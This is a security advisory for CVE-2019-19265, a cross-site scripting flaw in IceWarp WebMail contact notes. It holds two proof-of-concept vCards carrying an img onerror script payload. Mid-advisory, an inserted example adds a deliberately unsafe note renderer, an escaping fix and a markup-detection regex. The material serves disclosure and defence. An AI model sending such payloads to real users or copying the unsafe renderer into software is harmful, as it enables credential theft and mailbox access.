IceWarp 12.2.0 / 12.1.x Cross Site Scripting

Published: 02 Jan 2020 | Reported by: redteam-pentesting.de | Source: Packet Storm (packetstormsecurity.com)

IceWarp WebMail XSS vulnerability in contact note

Related

Family     Title                                                      Published
CNVD       IceWarp WebMail Server Cross-Site Scripting Vulnerability   7 Jan 2020 00:00
CVE        CVE-2019-19265                                              6 Jan 2020 00:09
Cvelist    CVE-2019-19265                                              6 Jan 2020 00:09
EUVD       EUVD-2019-8891                                              7 Oct 2025 00:30
NVD        CVE-2019-19265                                              6 Jan 2020 01:15
Prion      Cross site scripting                                        6 Jan 2020 01:15
RedhatCVE  CVE-2019-19265                                             22 May 2025 08:25
`Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts  
  
During a penetration test, RedTeam Pentesting discovered that the  
IceWarp WebMail Server is prone to user-assisted cross-site scripting  
attacks in its contact module. If IceWarp users import a manipulated  
vcard, for example from an email, attackers can run arbitrary JavaScript  
code in the users' browsers.  
  
  
Details  
=======  
  
Product: IceWarp WebMail Server  
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well  
Fixed Versions: IceWarp 12.2.1.1  
Vulnerability Type: Cross-Site Scripting  
Security Risk: high  
Vendor URL: http://www.icewarp.com/  
Vendor Status: patch available  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15  
Advisory Status: published  
CVE: CVE-2019-19265  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265  
  
Introduction  
============  
  
"Secure professional email with own domain and revolutionary integration  
with chat. Shared calendars for perfect planning."  
(from the vendor's homepage)  
  
  
More Details  
============  
  
IceWarp allows users to import contacts in vcard format [1], for example  
from an email attachment. Exporting a contact created in IceWarp shows  
that notes are stored as HTML, as in the following line:  
  
------------------------------------------------------------------------  
X-ALT-NOTE;FMTTYPE=text/html:<h1>RedTeam Pentesting</h1>  
------------------------------------------------------------------------  
  
IceWarp renders this note as HTML without sanitising it. If the note  
contains JavaScript and an IceWarp user imports the manipulated contact,  
the script runs in that user's browser. Neither the "X-ALT-NOTE" property  
nor its "FMTTYPE" parameter is defined in the vcard [1] standard; both  
are borrowed from the calendar format ical [2], which uses FMTTYPE to  
declare the media type of a property value. The vcard standard itself  
defines the plain "NOTE" property, and IceWarp renders that one as HTML  
as well, so it can be used to exploit the same cross-site scripting  
vulnerability.  
  
  
Proof of Concept  
================  
  
Send an IceWarp user one of the following vcards:  
  
------------------------------------------------------------------------  
BEGIN:VCARD  
VERSION:4.0  
FN:Pentesting\, RedTeam  
N:Pentesting;RedTeam;;;  
X-ALT-NOTE;FMTTYPE=text/html:<img style="display: none\;" src="x" onerror="alert('RedTeam Pentesting')">  
EMAIL;TYPE=INTERNET,PREF:[email protected]  
END:VCARD  
------------------------------------------------------------------------  
  
or  
  
------------------------------------------------------------------------  
BEGIN:VCARD  
VERSION:4.0  
FN:Pentesting\, RedTeam  
N:Pentesting;RedTeam;;;  
NOTE:<img style="display: none\;" src="x" onerror="alert('RedTeam Pentesting')">  
EMAIL;TYPE=INTERNET,PREF:[email protected]  
END:VCARD  
------------------------------------------------------------------------  
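The following is an added example, not code from the advisory or from IceWarp, showing what the "More Details" section and the two proofs of concept above boil down to: a small RFC 6350 content-line parser (unfolding plus the `\;` and `\,` value escapes the PoC relies on), the unsafe note rendering that produces the bug class, a hardened rendering that treats the note as text regardless of FMTTYPE, and a heuristic check a mail gateway or incident responder could run over .vcf attachments. It assumes the webmail client splices the note value into markup by string concatenation; IceWarp's real parser is not public. The sample vCards are constructed from the first PoC (with a placeholder address) and a benign contact.

```javascript
// Added example (not IceWarp's code): a minimal RFC 6350 vCard content-line
// parser, the unsafe note rendering the advisory describes, a hardened
// alternative, and a detector for .vcf attachments carrying markup.
// Assumption: the webmail client builds the contact view by string
// concatenation (innerHTML-style); IceWarp's actual parser is not public.

// Unfold continuation lines (RFC 6350 section 3.2): a line break followed
// by a space or tab continues the previous content line.
function unfold(text) {
  return text.replace(/\r?\n[ \t]/g, "");
}

// Undo value escaping (RFC 6350 section 3.4): \\ \; \, \n and \N.
function unescapeValue(v) {
  return v.replace(/\\([\\;,nN])/g, (_, c) => (c === "n" || c === "N" ? "\n" : c));
}

// Parse a vCard into {name, params, value} records. The name/parameter part
// ends at the first ':' (quoted parameter values containing ':' are not
// handled; that is enough for the advisory's proof of concept).
function parseVCard(text) {
  const props = [];
  for (const line of unfold(text).split(/\r?\n/)) {
    const colon = line.indexOf(":");
    if (colon < 0) continue;
    const [name, ...rawParams] = line.slice(0, colon).split(";");
    const params = {};
    for (const p of rawParams) {
      const eq = p.indexOf("=");
      if (eq > 0) params[p.slice(0, eq).toUpperCase()] = p.slice(eq + 1);
    }
    props.push({ name: name.toUpperCase(), params, value: unescapeValue(line.slice(colon + 1)) });
  }
  return props;
}

// Both note properties the advisory exercises; FMTTYPE is the iCalendar
// parameter IceWarp attaches to X-ALT-NOTE (default text/plain).
function extractNotes(text) {
  return parseVCard(text)
    .filter((p) => p.name === "NOTE" || p.name === "X-ALT-NOTE")
    .map((p) => ({ property: p.name, fmttype: p.params.FMTTYPE || "text/plain", value: p.value }));
}

// Vulnerable pattern: the attacker-controlled note is spliced into markup.
function renderNoteUnsafe(note) {
  return `<div class="note">${note.value}</div>`;
}

function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Hardened pattern: the note is text, whatever FMTTYPE claims. If rich notes
// are a requirement, pass the value through a real HTML sanitizer instead.
function renderNoteSafe(note) {
  return `<div class="note">${escapeHtml(note.value).replace(/\n/g, "<br>")}</div>`;
}

// Gateway / triage check: flag notes carrying tags, javascript: URLs or
// event-handler attributes. Heuristic, so treat hits as review items.
const MARKUP = /<[a-z!\/]|javascript:|\bon[a-z]+\s*=/i;
function suspiciousNotes(text) {
  return extractNotes(text).filter((n) => MARKUP.test(n.value));
}

// Constructed input: the advisory's first proof-of-concept vCard with a
// placeholder address. String.raw keeps the vCard escapes "\;" and "\," intact.
const POC_VCARD = String.raw`BEGIN:VCARD
VERSION:4.0
FN:Pentesting\, RedTeam
N:Pentesting;RedTeam;;;
X-ALT-NOTE;FMTTYPE=text/html:<img style="display: none\;" src="x" onerror="alert('RedTeam Pentesting')">
EMAIL;TYPE=INTERNET,PREF:contact@example.invalid
END:VCARD`;

// Constructed benign contact for comparison.
const BENIGN_VCARD = String.raw`BEGIN:VCARD
VERSION:4.0
FN:Jane Example
NOTE:Met at the conference\; follow up on Monday
END:VCARD`;

if (typeof require !== "undefined" && require.main === module) {
  for (const n of suspiciousNotes(POC_VCARD)) {
    console.log(`${n.property} (${n.fmttype}):`);
    console.log("  unsafe:", renderNoteUnsafe(n));
    console.log("  safe:  ", renderNoteSafe(n));
  }
  console.log("benign hits:", suspiciousNotes(BENIGN_VCARD).length);
}
```

Run with `node` to see the PoC note rendered both ways. The unescaping step matters: the `\;` in the PoC is vCard syntax, so the browser never sees the backslash, and the `onerror` handler arrives intact. The hardened renderer escapes every note, which is the right default for contact data imported from untrusted mail; allowlisting HTML should only be considered with a maintained sanitizer, never a hand-written one.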
  
  
Workaround  
==========  
  
None known.  
  
  
Fix  
===  
  
Update to IceWarp 12.2.1.1.  
  
  
Security Risk  
=============  
  
Attackers without an account on the IceWarp system can send specially  
crafted vcard [1] files to IceWarp users, for example as email  
attachments. If an IceWarp user imports such a contact into the IceWarp  
web application, the cross-site scripting vulnerability is triggered in  
that user's browser. This could, for example, be used to display a fake  
login form and capture the user's credentials, or to access any data  
stored in IceWarp such as emails, contacts, tasks, files or appointments.  
Access to these could in turn be abused to exploit the vulnerability  
described in rt-sa-2019-16 [3].  
This is considered to pose a high risk.  
  
  
Timeline  
========  
  
2019-11-11 Vulnerability identified  
2019-11-15 Vendor notified  
2019-11-22 Customer approved disclosure  
2019-11-25 CVE number requested  
2019-11-25 CVE number assigned  
2019-12-02 Vendor released fixed version  
2019-12-10 Customer approved disclosure  
2019-12-13 Fixed version released  
2020-01-02 Advisory released  
  
  
References  
==========  
  
[1] https://tools.ietf.org/html/rfc6350  
[2] https://tools.ietf.org/html/rfc2445  
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`
